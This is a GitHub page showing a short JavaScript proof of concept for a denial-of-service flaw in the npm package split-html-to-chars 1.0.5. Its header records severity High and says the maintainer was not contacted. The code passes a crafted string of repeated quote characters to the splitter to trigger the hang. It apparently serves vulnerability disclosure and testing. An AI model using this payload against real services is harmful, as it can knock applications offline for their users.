Permalink
Cannot retrieve contributors at this time
14 lines (13 sloc)
699 Bytes
Name already in use
A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
SaveResults/js/split-html-to-chars.js /
Go to fileThis commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /** | |
| * split-html-to-chars@1.0.5 | |
| * Package Manager: npm | |
| * Link to published package: https://github.com/akella/split-html-to-chars | |
| * Link to GitHub repo: https://github.com/akella/split-html-to-chars | |
| * Severity level: High | |
| * Module Description: Split html to letters for animation | |
| * Additional Info: It allows cause a denial of service when splitting crafted invalid htmls. | |
| * Contacted maintainer?: No | |
| * Open issue?: No | |
| */ | |
| var Splitter = require("split-html-to-chars/index.js") | |
| Splitter('<!""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""""!', '$', '<span class="word">$</span>') |